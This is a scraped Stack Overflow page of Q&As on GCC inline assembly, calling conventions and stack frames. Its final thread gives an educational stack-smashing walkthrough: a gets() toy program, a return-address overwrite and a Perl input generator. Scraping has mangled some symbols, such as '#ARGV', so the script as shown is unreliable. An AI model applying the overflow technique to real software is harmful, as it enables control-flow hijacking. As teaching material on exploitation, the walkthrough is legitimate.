how to call printf in C __asm__()? [duplicate]

how to call printf in C __asm__()? [duplicate] - c

This question already has an answer here:
Calling printf in extended inline ASM
(1 answer)
Closed 3 years ago.
I am trying to print AAAA using c __asm__ as following:
#include <stdio.h>
int main()
{
__asm__("sub $0x150, %rsp\n\t"
"mov $0x0,%rax\n\t"
"lea -0x140(%rbp), %rax\n\t"
"movl $0x41414141,(%rax)\n\t"
"movb $0x0, 0x4(%rax)\n\t"
"lea -0x140(%rbp), %rax\n\t"
"mov %rax, %rdi\n\t"
"call printf\n\t");
return 0;
}
Disassembly:
Dump of assembler code for function main:
0x0000000000400536 <+0>: push %rbp
0x0000000000400537 <+1>: mov %rsp,%rbp
0x000000000040053a <+4>: sub $0x150,%rsp
0x0000000000400541 <+11>: mov $0x0,%rax
0x0000000000400548 <+18>: lea -0x140(%rbp),%rax
0x000000000040054f <+25>: movl $0x41414141,(%rax)
0x0000000000400555 <+31>: movb $0x0,0x4(%rax)
0x0000000000400559 <+35>: lea -0x140(%rbp),%rax
0x0000000000400560 <+42>: mov %rax,%rdi
0x0000000000400563 <+45>: callq 0x400410 <printf#plt>
0x0000000000400568 <+50>: mov $0x0,%eax
0x000000000040056d <+55>: pop %rbp
0x000000000040056e <+56>: retq
End of assembler dump.
While running the code, there are basically two issues. #1 that it does not print "AAAA", #1 that when the RIP reaches retq, it throws segmentation fault
is there anything I am missing?

Your code has the following problems:
The main problem of your code is that you fail to restore the stack pointer to its previous value after calling printf. The compiler does not know that you modified the stack pointer and tries to return to whatever address is at (%rsp), crashing your program. To fix this, restore rsp to the value it had at the beginning of the asm statement.
you forgot to set up al with 0 to indicate that no floating point values are being passed to printf. This is needed as printf is a variadic function. While it doesn't cause any problems to set al to a value too high (and all values are less than or equal to 0), it is still good practice to set up al correctly. To fix this, set al to 0 before calling printf.
That said, you cannot safely assume that the compiler is going to set up a base pointer. To fix this, make sure to only reference rsp instead of rbp or use extended asm to let the compiler figure this out.
take care not to overwrite the stack. Note that the 128 bytes below rsp are called the red zone and must be preserved, too. This is fine in your code as you allocate enough stack space to avoid this issue.
your code tacitly assumes that the stack is aligned to a multiple of 16 bytes on entry to the asm statement. This too is an assumption you cannot make. To fix this, align the stack pointer to a multiple of 16 bytes before calling printf.
you overwrite a bunch of registers; apart from rax and rdi, the call to printf may overwrite any caller-saved register. The compiler does not know that you did so and may assume that all registers kept the value they had before. To fix this, declare an appropriate clobber list or save and restore all registers you plan to overwrite, including all caller-saved registers.
So TL;DR: don't call functions from inline assembly and don't use inline assembly as a learning tool! It's very hard to get right and does not teach you anything useful about assembly programming.
Example in Pure Assembly
Here is how I would write your code in normal assembly. This is what I suggest you to do:
.section .rodata # enter the read-only data section
str: .string "AAAA" # and place the string we want to print there
.section .text # enter the text section
.global main # make main visible to the link editor
main: push %rbp # establish...
mov %rsp, %rbp # ...a stack frame (and align rsp to 16 bytes)
lea str(%rip), %rdi # load the effective address of str to rdi
xor %al, %al # tell printf we have no floating point args
call printf # call printf(str)
leave # tear down the stack frame
ret # return
Example in Inline Assembly
Here is how you could call a function in inline assembly. Understand that you should never ever do this. Not even for educational purposes. It's just terrible to do this. If you want to call a function in C, do it in C code, not inline assembly.
That said, you could do something like this. Note that we use extended assembly to make our life a lot easier:
int main(void)
{
char fpargs = 0; /* dummy variable: no fp arguments */
const char *str = "AAAA";/* the string we want to print */
__asm__ volatile ( /* volatile means we do more than just
returning a result and ban the compiler
from optimising our asm statement away */
"mov %%rsp, %%rbx;" /* save the stack pointer */
"and $~0xf, %%rsp;" /* align stack to 16 bytes */
"sub $128, %%rsp;" /* skip red zone */
"call printf;" /* do the actual function call */
"mov %%rbx, %%rsp" /* restore the stack pointer */
: /* (pseudo) output operands: */
"+a"(fpargs), /* al must be 0 (no FP arguments) */
"+D"(str) /* rdi contains pointer to string "AAAA" */
: /* input operands: none */
: /* clobber list */
"rsi", "rdx", /* all other registers... */
"rcx", "r8", "r9", /* ...the function printf... */
"r10", "r11", /* ...is allowed to overwrite */
"rbx", /* and rbx which we use for scratch space */
"cc", /* and flags */
"memory"); /* and arbitrary memory regions */
return (0); /* wrap this up */
}

Related

alternative to mangling jmp_buf in c for a context switch

In setjmp.h library in linux system jmp_buf is encrypted to decrypt it we use mangle function
*/static long int i64_ptr_mangle(long int p) {
long int ret;
asm(" mov %1, %%rax;\n"
" xor %%fs:0x30, %%rax;"
" rol $0x11, %%rax;"
" mov %%rax, %0;"
: "=r"(ret)
: "r"(p)
: "%rax"
);
return ret;
}
I need to save the context and change the stack pointer, base pointer and program counter in jmp_buffer any alternative to this function that I can use. I am trying to build basic thread library can't head around this. I can't use ucontext.h .

You might as well roll your own version of setjmp/longjmp; even if you reverse engineered that mess, your result will be more fragile than a proper version.
You will need to have a peek at the calling conventions for your environment, but mainly something like:
mov 4(%esp), %eax
mov %ebx, _BX(%eax)
mov %esi, _SI(%eax)
mov %edi, _DI(%eax)
mov %ebp, _BP(%eax)
pushf; pop _FL(%eax)
mov %esp, _SP(%eax)
pop _PC(%eax)
xor %eax,%eax
ret
loadctx:
mov 4(%esp), %edx
mov 8(%esp), %eax
mov _BX(%edx), %ebx
...
push _FL(%edx)
popf
mov _SP(%edx), %esp
jmp _PC(%edx)
Then you define your register layout maybe like:
#define _PC 0
#define _SP 4
#define _FL 8
...
This should work in a dated compiler, like gcc2.x as is. More modern compilers have been, uh, enhanced, to rely on thead local storage(TLS) and the like. You may have to add bits to your context.
Another enhancement is stack checking, typically layered on TLS. Even if you disable stack checking, it is possible that libraries you use will rely on it, so you will have to swap the appropriate entries.

too many memory references for `mov' when calling a golang function with C by using inline assembly

I'm trying to call a golang function from my C code. Golang does not use the standard x86_64 calling convention, so I have to resort to implementing the transition myself. As gcc does not want to mix cdecl with the x86_64 convention,
I'm trying to call the function using inline assembly:
void go_func(struct go_String filename, void* key, int error){
void* f_address = (void*)SAVEECDSA;
asm volatile(" sub rsp, 0xe0; \t\n\
mov [rsp+0xe0], rbp; \t\n\
mov [rsp], %0; \t\n\
mov [rsp+0x8], %1; \t\n\
mov [rsp+0x18], %2; \t\n\
call %3; \t\n\
mov rbp, [rsp+0xe0]; \t\n\
add rsp, 0xe0;"
:
: "g"(filename.str), "g"(filename.len), "g"(key), "g"(f_address)
: );
return;
}
Sadly the compiler always throws an error at me that I dont understand:
./code.c:241: Error: too many memory references for `mov'
This corresponds to this line: mov [rsp+0x18], %2; \t\n\ If I delete it, the compilation works. I don't understand what my mistake is...
I'm compiling with the -masm=intel flag so I use Intel syntax. Can someone please help me?

A "g" constraint allows the compiler to pick memory or register, so obviously you'll end up with mov mem,mem if that happens. mov can have at most 1 memory operand. (Like all x86 instructions, at most one explicit memory operand is possible.)
Use "ri" constraints for the inputs that will be moved to a memory destination, to allow register or immediate but not memory.
Also, you're modifying RSP so you can't safely use memory source operands. The compiler is going to assume it can use addressing modes like [rsp+16] or [rsp-4]. So you can't use push instead of mov.
You also need to declare clobbers on all the call-clobbered registers, because the function call will do that. (Or better, maybe ask for the inputs in those call-clobbered registers so the compiler doesn't have to bounce them through call-preserved regs like RBX. But you need to make those operands read/write or declare separate output operands for the same registers to let the compiler know they'll be modified.)
So probably your best bet for efficiency is something like
int ecx, edx, edi, esi; // dummy outputs as clobbers
register int r8 asm("r8d"); // for all the call-clobbered regs in the calling convention
register int r9 asm("r9d");
register int r10 asm("r10d");
register int r11 asm("r11d");
// These are the regs for x86-64 System V.
// **I don't know what Go actually clobbers.**
asm("sub rsp, 0xe0\n\t" // adjust as necessary to align the stack before a call
// "push args in reverse order"
"push %[fn_len] \n\t"
"push %[fn_str] \n\t"
"call \n\t"
"add rsp, 0xe0 + 3*8 \n\t" // pop red-zone skip space + pushed args
// real output in RAX, and dummy outputs in call-clobbered regs
: "=a"(retval), "=c"(ecx), "=d"(edx), "=D"(edi), "=S"(esi), "=r"(r8), "=r"(r9), "=r"(r10), "=r"(r11)
: [fn_str] "ri" (filename.str), [fn_len] "ri" (filename.len), etc. // inputs can use the same regs as dummy outputs
: "xmm0", "xmm1", "xmm2", "xmm3", "xmm4", "xmm5", "xmm6", "xmm7", // All vector regs are call-clobbered
"xmm8", "xmm9", "xmm10", "xmm11", "xmm12", "xmm13", "xmm14", "xmm15",
"memory" // if you're passing any pointers (even read-only), or the function accesses any globals,
// best to make this a compiler memory barrier
);
Notice that the output are not early-clobber, so the compiler can (at its option) use those registers for inputs, but we're not forcing it so the compiler is still free to use some other register or an immediate.
Upon further discussion, Go functions don't clobber RBP, so there's no reason to save/restore it manually. The only reason you might have wanted to is that locals might use RBP-relative addressing modes, and older GCC made it an error to declare a clobber on RBP when compiling without -fomit-frame-pointer. (I think. Or maybe I'm thinking of EBX in 32-bit PIC code.)
Also, if you're using the x86-64 System V ABI, beware that inline asm must not clobber the red-zone. The compiler assumes that doesn't happen and there's no way to declare a clobber on the red zone or even set -mno-redzone on a per-function basis. So you probably need to sub rsp, 128 + 0xe0. Or 0xe0 already includes enough space to skip the red-zone if that's not part of the callee's args.

The original poster added this solution as an edit to their question:
If someone ever finds this, the accepted answer does not help you when you try to call golang code with inline asm! The accepted answer only helps with my initial problem, which helped me to fix the golangcall. Use something like this:**
void* __cdecl go_call(void* func, __int64 p1, __int64 p2, __int64 p3, __int64 p4){
void* ret;
asm volatile(" sub rsp, 0x28; \t\n\
mov [rsp], %[p1]; \t\n\
mov [rsp+0x8], %[p2]; \t\n\
mov [rsp+0x10], %[p3]; \t\n\
mov [rsp+0x18], %[p4]; \t\n\
call %[func_addr]; \t\n\
add rsp, 0x28; "
:
: [p1] "ri"(p1), [p2] "ri"(p2),
[p3] "ri"(p3), [p4] "ri"(p4), [func_addr] "ri"(func)
: );
return ret;
}

Why is there no "sub rsp" instruction in this function prologue and why are function parameters stored at negative rbp offsets?

That's what I understood by reading some memory segmentation documents: when a function is called, there are a few instructions (called function prologue) that save the frame pointer on the stack, copy the value of the stack pointer into the base pointer and save some memory for local variables.
Here's a trivial code I am trying to debug using GDB:
void test_function(int a, int b, int c, int d) {
int flag;
char buffer[10];
flag = 31337;
buffer[0] = 'A';
}
int main() {
test_function(1, 2, 3, 4);
}
The purpose of debugging this code was to understand what happens in the stack when a function is called: so I had to examine the memory at various step of the execution of the program (before calling the function and during its execution). Although I managed to see things like the return address and the saved frame pointer by examining the base pointer, I really can't understand what I'm going to write after the disassembled code.
Disassembling:
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400509 <+0>: push rbp
0x000000000040050a <+1>: mov rbp,rsp
0x000000000040050d <+4>: mov ecx,0x4
0x0000000000400512 <+9>: mov edx,0x3
0x0000000000400517 <+14>: mov esi,0x2
0x000000000040051c <+19>: mov edi,0x1
0x0000000000400521 <+24>: call 0x4004ec <test_function>
0x0000000000400526 <+29>: pop rbp
0x0000000000400527 <+30>: ret
End of assembler dump.
(gdb) disassemble test_function
Dump of assembler code for function test_function:
0x00000000004004ec <+0>: push rbp
0x00000000004004ed <+1>: mov rbp,rsp
0x00000000004004f0 <+4>: mov DWORD PTR [rbp-0x14],edi
0x00000000004004f3 <+7>: mov DWORD PTR [rbp-0x18],esi
0x00000000004004f6 <+10>: mov DWORD PTR [rbp-0x1c],edx
0x00000000004004f9 <+13>: mov DWORD PTR [rbp-0x20],ecx
0x00000000004004fc <+16>: mov DWORD PTR [rbp-0x4],0x7a69
0x0000000000400503 <+23>: mov BYTE PTR [rbp-0x10],0x41
0x0000000000400507 <+27>: pop rbp
0x0000000000400508 <+28>: ret
End of assembler dump.
I understand that "saving the frame pointer on the stack" is done by " push rbp", "copying the value of the stack pointer into the base pointer" is done by "mov rbp, rsp" but what is getting me confused is the lack of a "sub rsp $n_bytes" for "saving some memory for local variables". I've seen that in a lot of exhibits (even in some topics here on stackoverflow).
I also read that arguments should have a positive offset from the base pointer (after it's filled with the stack pointer value), since if they are located in the caller function and the stack grows toward lower addresses it makes perfect sense that when the base pointer is updated with the stack pointer value the compiler goes back in the stack by adding some positive numbers. But my code seems to store them in a negative offset, just like local variables.. I also can't understand why they are put in those registers (in the main).. shouldn't they be saved directly in the rsp "offsetted"?
Maybe these differences are due to the fact that I'm using a 64 bit system, but my researches didn't lead me to anything that would explain what I am facing.

The System V ABI for x86-64 specifies a red zone of 128 bytes below %rsp. These 128 bytes belong to the function as long as it doesn't call any other function (it is a leaf function).
Signal handlers (and functions called by a debugger) need to respect the red zone, since they are effectively involuntary function calls. All of the local variables of your test_function, which is a leaf function, fit into the red zone, thus no adjustment of %rsp is needed. (Also, the function has no visible side-effects and would be optimized out on any reasonable optimization setting).
You can compile with -mno-red-zone to stop the compiler from using space below the stack pointer. Kernel code has to do this because hardware interrupts don't implement a red-zone.

But my code seems to store them in a negative offset, just like local variables
The first x86_64 arguments are passed on registers, not on the stack. So when rbp is set to rsp, they are not on the stack, and cannot be on a positive offset.
They are being pushed only to:
save register state for a second function call.
In this case, this is not required since it is a leaf function.
make register allocation easier.
But an optimized allocator could do a better job without memory spill here.
The situation would be different if you had:
x86_64 function with lots of arguments. Those that don't fit on registers go on the stack.
IA-32, where every argument goes on the stack.
the lack of a "sub rsp $n_bytes" for "saving some memory for local variables".
The missing sub rsp on red zone of leaf function part of the question had already been asked at: Why does the x86-64 GCC function prologue allocate less stack than the local variables?

"unsupported for mov" GCC inline assembler

While playing around with GCC's inline assembler feature, I tried to make a function which immediately exited the process, akin to _Exit from the C standard library.
Here is the relevant piece of source code:
void immediate_exit(int code)
{
#if defined(__x86_64__)
asm (
//Load exit code into %rdi
"mov %0, %%rdi\n\t"
//Load system call number (group_exit)
"mov $231, %%rax\n\t"
//Linux syscall, 64-bit version.
"syscall\n\t"
//No output operands, single unrestricted input register, no clobbered registers because we're about to exit.
:: "" (code) :
);
//Skip other architectures here, I'll fix these later.
#else
# error "Architecture not supported."
#endif
}
This works fine for debug builds (with -O0), but as soon as I turn optimisation on at any level, I get the following error:
immediate_exit.c: Assembler messages:
immediate_exit.c:4: Error: unsupported for `mov'
So I looked at the assembler output for both builds (I've removed .cfi* directives and other things for clarity, I can add that in again if it's a problem). The debug build:
immediate_exit:
.LFB0:
pushq %rbp
movq %rsp, %rbp
movl %edi, -4(%rbp)
mov -4(%rbp), %rdi
mov $231, %rax
syscall
popq %rbp
ret
And the optimised version:
immediate_exit:
.LFB0:
mov %edi, %rdi
mov $231, %rax
syscall
ret
So the optimised version is trying to put a 32-bit register edi into a 64-bit register, rdi, rather than loading it from rbp, which I presume is what is causing the error.
Now, I can fix this by specifying 'm' as a register constraint for code, which causes GCC to load from rbp regardless of optimisation level. However, I'd rather not do that, because I think the compiler and its authors has a much better idea about where to put stuff than I do.
So (finally!) my question is: how do I persuade GCC to use rdi rather than edi for the assembly output?

Overall, you're much better off using constraints to get values into the right registers rather than explicit moves:
#include <asm/unistd.h>
asm volatile("syscall"
: // no outputs. Other syscalls need an "=a"(retval) to tell the compiler RAX is modified, whether you actually use the retval or not.
: "D" ((uint64_t)code), "a" ((uint64_t)__NR_exit_group) // 231
: "rcx", "r11" // syscall itself clobbers these. exit can't fail and return; mostly here as an example for other syscalls
, "memory" // make sure any stores, e.g. to mmapped files, are done before this
);
__builtin_unreachable(); // tell the compiler execution doesn't come out the bottom of the asm statement. Maybe have the same effect as a "memory" clobber of making sure not to delay stores which could potentially be to mmapped files or shared memory.
That lets compiler hoist the moves earlier in the code if useful, or even avoid the move altogether if the value can be arranged to already be in the correct register...
For example code will be in EDI if this function doesn't inline; the Linux system-calling convention was chosen to be as close as possible to the x86-64 System V function-calling convention, except for using R10 instead of RCX because the syscall instruction itself overwrites it with saved-RIP, and R11 with saved-RFLAGS.
(Unnecessarily casting (uint64_t)code would force the compiler to redo zero-extension with a mov %edi, %edi in that case, though. The call number does need to be zero-extended to 64-bit, which will almost certainly happen for free even if you didn't manually cast it (since the compiler will use a mov $231, %eax), but it doesn't hurt to be explicit about something that is required. The exit_group system call takes a 32-bit int arg, so the kernel is guaranteed to ignore high garbage in RDI.)

Cast your variable into the appropriate length type.
#include <stdint.h>
asm (
//Load exit code into %rdi
"mov %0, %%rdi\n\t"
//Load system call number (group_exit)
"mov $231, %%rax\n\t"
//Linux syscall, 64-bit version.
"syscall\n\t"
//No output operands, single unrestricted input register, no clobbered registers because we're about to exit.
:: "g" ((uint64_t)code)
);
or better have your operand type straight away of the right size:
void immediate_exit(uint64_t code) { ...

Trying to smash the stack

I am trying to reproduce the stackoverflow results that I read from Aleph One's article "smashing the stack for fun and profit"(can be found here:http://insecure.org/stf/smashstack.html).
Trying to overwrite the return address doesn't seem to work for me.
C code:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
//Trying to overwrite return address
ret = buffer1 + 12;
(*ret) = 0x4005da;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
disassembled main:
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004005b0 <+0>: push %rbp
0x00000000004005b1 <+1>: mov %rsp,%rbp
0x00000000004005b4 <+4>: sub $0x10,%rsp
0x00000000004005b8 <+8>: movl $0x0,-0x4(%rbp)
0x00000000004005bf <+15>: mov $0x3,%edx
0x00000000004005c4 <+20>: mov $0x2,%esi
0x00000000004005c9 <+25>: mov $0x1,%edi
0x00000000004005ce <+30>: callq 0x400564 <function>
0x00000000004005d3 <+35>: movl $0x1,-0x4(%rbp)
0x00000000004005da <+42>: mov -0x4(%rbp),%eax
0x00000000004005dd <+45>: mov %eax,%esi
0x00000000004005df <+47>: mov $0x4006dc,%edi
0x00000000004005e4 <+52>: mov $0x0,%eax
0x00000000004005e9 <+57>: callq 0x400450 <printf#plt>
0x00000000004005ee <+62>: leaveq
0x00000000004005ef <+63>: retq
End of assembler dump.
I have hard coded the return address to skip the x=1; code line, I have used a hard coded value from the disassembler(address : 0x4005da). The intent of this exploit is to print 0, but instead it is printing 1.
I have a very strong feeling that "ret = buffer1 + 12;" is not the address of the return address. If this is the case, how can I determine the return address, is gcc allocating more memory between the return address and the buffer.

Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:
Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:
C code:
void function()
{
char buffer[4];
}
int main()
{
function();
}
Assembly (abridged):
function:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
leave
ret
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
call function
...
There are several tools that you can use to inspect the assembly code. First, of course, is
compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are little to no hints for what code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.
The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.
This function function takes the return address and increments 7 to it. The instruction that
the return address originally pointed to is 7 bytes in length, so adding 7 makes the return address point to the instruction immediately after the assignment.
In the example below, I overwrite the return address to skip the instruction x = 1.
simple C program:
void function()
{
char buffer[4];
/* return address is 8 bytes beyond the start of the buffer */
int *ret = buffer + 8;
/* assignment instruction we want to skip is 7 bytes long */
(*ret) += 7;
}
int main()
{
int x = 0;
function();
x = 1;
printf("%d\n",x);
}
Main function (x = 1 at 80483af is seven bytes long):
8048392: 8d4c2404 lea 0x4(%esp),%ecx
8048396: 83e4f0 and $0xfffffff0,%esp
8048399: ff71fc pushl -0x4(%ecx)
804839c: 55 push %ebp
804839d: 89e5 mov %esp,%ebp
804839f: 51 push %ecx
80483a0: 83ec24 sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8 mov -0x8(%ebp),%eax
80483b9: 89442404 mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff call 80482d8 <printf#plt>
80483c9: 83c424 add $0x24,%esp
80483cc: 59 pop %ecx
80483cd: 5d pop %ebp
We know where the return address is and we have demonstrated that changing it can affect the
code that is run. A buffer overflow can do the same thing by using gets and inputing the right character string so that the return address is overwritten with a new address.
In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.
#include <stdio.h>
#include <stdlib.h>
void uncalled()
{
puts("uh oh!");
exit(1);
}
void function()
{
char buffer[4];
gets(buffer);
}
int main()
{
function();
puts("program secure");
}
To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.) , you need to swap the endianness of the address.
In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.
#!/usr/bin/perl
print "x"x#ARGV[1]; # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . #ARGV[0] , -8); # swap endian of input
print "\n"; # new line to end gets

You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.
I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:
char buffer1[5] = "1111";
char buffer2[10] = "2222";

You can figure this out by printing out the stack. Add code like this:
int* pESP;
__asm mov pESP, esp
The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.
What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set a compiler switches to turn all this stuff off.

As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I remove the buffer2 variable, and change buffer1 to 8 bytes so things are more aligned. We will also compile in 32 bit more do make it easier to read the addresses, and turn debugging on(gcc -m32 -g).
void function(int a, int b, int c) {
char buffer1[8];
char *ret;
so let's print the address of buffer1:
(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40
then let's print a bit past that and see what's on the stack.
(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000 0x00000000 0xfecf25c3 0x00000003
0xbffffa50: 0x00000000 0xbffffb50 0xbffffa88 0x00001f3b
0xbffffa60: 0x00000001 0x00000002 0x00000003 0x00000000
0xbffffa70: 0x00000003 0x00000002 0x00000001 0x00001efc
Do a backtrace to see where the return address should be pointing:
(gdb) bt
#0 function (a=1, b=2, c=3) at foo.c:18
#1 0x00001f3b in main () at foo.c:26
and sure enough, there it is at 0xbffffa5b:
(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf

Develop Reference

c reactjs sql-server angularjs arrays wpf database batch-file google-app-engine silverlight

how to call printf in C asm()? [duplicate] - c

Related

alternative to mangling jmp_buf in c for a context switch

too many memory references for `mov' when calling a golang function with C by using inline assembly

Why is there no "sub rsp" instruction in this function prologue and why are function parameters stored at negative rbp offsets?

"unsupported for mov" GCC inline assembler

Trying to smash the stack

Categories

Resources